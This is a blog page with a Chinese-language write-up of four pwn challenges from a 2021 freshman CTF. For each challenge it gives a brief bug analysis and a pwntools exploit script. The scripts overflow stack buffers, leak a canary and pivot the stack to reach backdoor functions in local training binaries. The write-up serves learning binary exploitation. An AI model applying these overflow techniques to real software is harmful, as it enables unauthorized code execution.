<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="John Doe">





<title>2021_0rays新生赛 | hash_hash的博客</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        <!-- MathJax配置，可通过单美元符号书写行内公式等 -->
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
    "HTML-CSS": {
        preferredFont: "TeX",
        availableFonts: ["STIX","TeX"],
        linebreaks: { automatic:true },
        EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
        inlineMath: [ ["$", "$"], ["\\(","\\)"] ],
        processEscapes: true,
        ignoreClass: "tex2jax_ignore|dno",
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
        equationNumbers: { autoNumber: "AMS" },
        noUndefined: { attributes: { mathcolor: "red", mathbackground: "#FFEEEE", mathsize: "90%" } },
        Macros: { href: "{}" }
    },
    messageStyle: "none"
    });
</script>
<!-- 给MathJax元素添加has-jax class -->
<script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for(i=0; i < all.length; i += 1) {
            all[i].SourceElement().parentNode.className += ' has-jax';
        }
    });
</script>
<!-- 通过连接CDN加载MathJax的js代码 -->
<script type="text/javascript" async
        src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML">
</script>


    


<meta name="generator" content="Hexo 6.1.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">hash_hash&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/friend">Friends</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">hash_hash&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/friend">Friends</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    var tocbot_timer;
    var DEPTH_MAX = 6;    // 为 6 时展开所有
    var tocbot_default_config = {
        tocSelector: '.tocbot-list',
        contentSelector: '.post-content',
        headingSelector: 'h1, h2, h3, h4, h5',
        orderedList: false,
        scrollSmooth: true,
        onClick: extend_click,
    };

    function extend_click() {
        clearTimeout(tocbot_timer);
        tocbot_timer = setTimeout(function () {
            tocbot.refresh(obj_merge(tocbot_default_config, { hasInnerContainers: true }));
        }, 420); // 这个值是由 tocbot 源码里定义的 scrollSmoothDuration 得来的
    }

    document.ready(function () {
        tocbot.init(obj_merge(tocbot_default_config, { collapseDepth: 1 }));
    });

    function expandToc() {
        var b = document.querySelector('.tocbot-toc-expand');
        var expanded = b.getAttribute('data-expanded');
        expanded ? b.removeAttribute('data-expanded') : b.setAttribute('data-expanded', true);
        tocbot.refresh(obj_merge(tocbot_default_config, { collapseDepth: expanded ? 1 : DEPTH_MAX }));
        b.innerText = expanded ? 'Expand all' : 'Collapse all';
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

    function obj_merge(target, source) {
        for (var item in source) {
            if (source.hasOwnProperty(item)) {
                target[item] = source[item];
            }
        }
        return target;
    }
</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">2021_0rays新生赛</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">John Doe</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">May 18, 2022&nbsp;&nbsp;22:03:31</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/Pwn/">Pwn</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <p>找的nameless师傅他们学校去年新生赛的题目做了做，收获不小，gdb使用有了长进</p>
<p><a target="_blank" rel="noopener" href="http://training.0rays.club/challenges">题目地址</a></p>
<p>环境关了，下载附件本地打打</p>
<h2 id="QvQ"><a href="#QvQ" class="headerlink" title="QvQ"></a>QvQ</h2><img src="/2022/05/18/%E4%B8%8D%E5%B1%95%E7%A4%BA%E6%96%87%E6%A1%A3/20210rays%E6%96%B0%E7%94%9F%E8%B5%9B/pic1.png" class>

<p>简单覆盖，构造payload使条件满足即可，注意strcmp是\x00截断</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=process(<span class="string">&#x27;./QvQ&#x27;</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>+<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x39</span>-<span class="number">0x31</span>)+<span class="string">b&#x27;a&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>+<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x30</span>-<span class="number">0xc</span>)+p32(<span class="number">135797531</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="Q-Q"><a href="#Q-Q" class="headerlink" title="Q_Q"></a>Q_Q</h2><p>这个题纠正了我一个误区，我一直以为strcmp遇到\x00只比较\x00前面的字符是否相等，结果查了下源码是比较的\x00及前面的所有字符</p>
<p>gdb调试的时候查看一下s1地址的内存</p>
<img src="/2022/05/18/%E4%B8%8D%E5%B1%95%E7%A4%BA%E6%96%87%E6%A1%A3/20210rays%E6%96%B0%E7%94%9F%E8%B5%9B/pic2.png" class>

<p>截止到\x00也就是把前20字节输入</p>
<p>后面只需覆盖一个四字节整数即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=process(<span class="string">&#x27;./Q_Q&#x27;</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">payload1=p32(<span class="number">0x11756f79</span>)+p32(<span class="number">0x6465656e</span>)+p32(<span class="number">0x6e777022</span>)+p32(<span class="number">0x6c6f6f74</span>)+p32(<span class="number">0x00332173</span>)</span><br><span class="line">p.send(payload1)</span><br><span class="line">payload2=<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x1f</span>-<span class="number">0xc</span>)+p32(<span class="number">135797531</span>)</span><br><span class="line">p.sendline(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="QAQ"><a href="#QAQ" class="headerlink" title="QAQ"></a>QAQ</h2><img src="/2022/05/18/%E4%B8%8D%E5%B1%95%E7%A4%BA%E6%96%87%E6%A1%A3/20210rays%E6%96%B0%E7%94%9F%E8%B5%9B/pic3.png" class>

<p>F5反编译出来的东西少了流程，得自己看看汇编</p>
<img src="/2022/05/18/%E4%B8%8D%E5%B1%95%E7%A4%BA%E6%96%87%E6%A1%A3/20210rays%E6%96%B0%E7%94%9F%E8%B5%9B/pic4.png" class>

<p>我们可以看的strcmp后如果返回值为0则跳转</p>
<img src="/2022/05/18/%E4%B8%8D%E5%B1%95%E7%A4%BA%E6%96%87%E6%A1%A3/20210rays%E6%96%B0%E7%94%9F%E8%B5%9B/pic5.png" class>

<p>这里相当于一个后门但是没在反编译的时候编译成函数，可以看到需要满足[ebp+var_44]&#x3D;1b最后才能执行system(‘&#x2F;bin&#x2F;sh’)，这样我们就往前看看哪个地方能够改到[ebp+var_44]</p>
<img src="/2022/05/18/%E4%B8%8D%E5%B1%95%E7%A4%BA%E6%96%87%E6%A1%A3/20210rays%E6%96%B0%E7%94%9F%E8%B5%9B/pic6.png" class>

<p>这里看到call read后会把[ebp+arg_0]赋给[ebp+var_44]，所以我们只需要覆盖[ebp+arg_0]为1b即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=process(<span class="string">&#x27;./QAQ&#x27;</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x40</span>-<span class="number">0x37</span>)+<span class="string">b&#x27;\x00&#x27;</span>+<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x40</span>-<span class="number">0x37</span>)+<span class="string">b&#x27;\x00&#x27;</span></span><br><span class="line">payload+=<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x40</span>-<span class="built_in">len</span>(payload))+<span class="string">b&#x27;aaaaaaaa&#x27;</span>+p32(<span class="number">0x1b</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="T-T"><a href="#T-T" class="headerlink" title="T^T"></a>T^T</h2><img src="/2022/05/18/%E4%B8%8D%E5%B1%95%E7%A4%BA%E6%96%87%E6%A1%A3/20210rays%E6%96%B0%E7%94%9F%E8%B5%9B/pic7.png" class>

<p>func1和func2两函数但是func1有输入func2无输入，要求func2栈内的某个变量为要求值</p>
<p>这里需要了解栈帧的结构，由main调用的子函数都是在main的栈帧的低地址接着开辟一段新栈帧，于是func1和func2会有共用的同一段栈内存，且退栈的时候只是移动esp并不会抹除栈段数据，所以我们可以通过func1的输入对func2中v1所存值进行修改，gdb看一下相对位置即可</p>
<p>然后就是栈溢出了，可是没能打通，然后去读汇编会发现最后返回时执行了以下操作</p>
<img src="/2022/05/18/%E4%B8%8D%E5%B1%95%E7%A4%BA%E6%96%87%E6%A1%A3/20210rays%E6%96%B0%E7%94%9F%E8%B5%9B/pic8.png" class>

<p>需要了解</p>
<p>mov后加中括号为取地址内存，lea后寄存器必须加中括号，为取值</p>
<p>最后esp存的是[ebp+var_4]-4的内容，这也是为什么一开始把backdoor的地址赋给了一个全局变量，于是我们将这个地址填到bss段上的存backdoor地址的全局变量地址加4即可，之后pop eip就是把esp所指向地址的内存压到eip里，即可执行backdoor函数了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=process(<span class="string">&#x27;./TT&#x27;</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">backdoor=<span class="number">0x804B01C</span></span><br><span class="line">payload1=<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x70</span>-<span class="number">0x14</span>)+p32(<span class="number">123454321</span>)</span><br><span class="line">p.sendline(payload1)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;gift:&#x27;</span>)</span><br><span class="line">canary=<span class="built_in">int</span>(p.recvline()[:-<span class="number">1</span>],<span class="number">16</span>)</span><br><span class="line">payload2=<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x16</span>-<span class="number">0xc</span>)+p32(canary)+<span class="string">b&#x27;aaaa&#x27;</span>+p32(backdoor+<span class="number">4</span>)</span><br><span class="line">p.sendline(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>


        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>John Doe</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="https://hash-hash.github.io/2022/05/18/%E4%B8%8D%E5%B1%95%E7%A4%BA%E6%96%87%E6%A1%A3/20210rays%E6%96%B0%E7%94%9F%E8%B5%9B/">https://hash-hash.github.io/2022/05/18/%E4%B8%8D%E5%B1%95%E7%A4%BA%E6%96%87%E6%A1%A3/20210rays%E6%96%B0%E7%94%9F%E8%B5%9B/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>Do you believe in <strong>DESTINY</strong>?</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/gdb/"># gdb</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2022/05/18/20210rays%E6%96%B0%E7%94%9F%E8%B5%9B/">2021_0rays新生赛</a>
            
            
            <a class="next" rel="next" href="/2022/05/17/%E4%B8%8D%E5%B1%95%E7%A4%BA%E6%96%87%E6%A1%A3/Writeup-for-Crypto-Problem-in-2022TJCTF/">Writeup for Crypto Problem in 2022TJCTF</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© John Doe | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>

</html>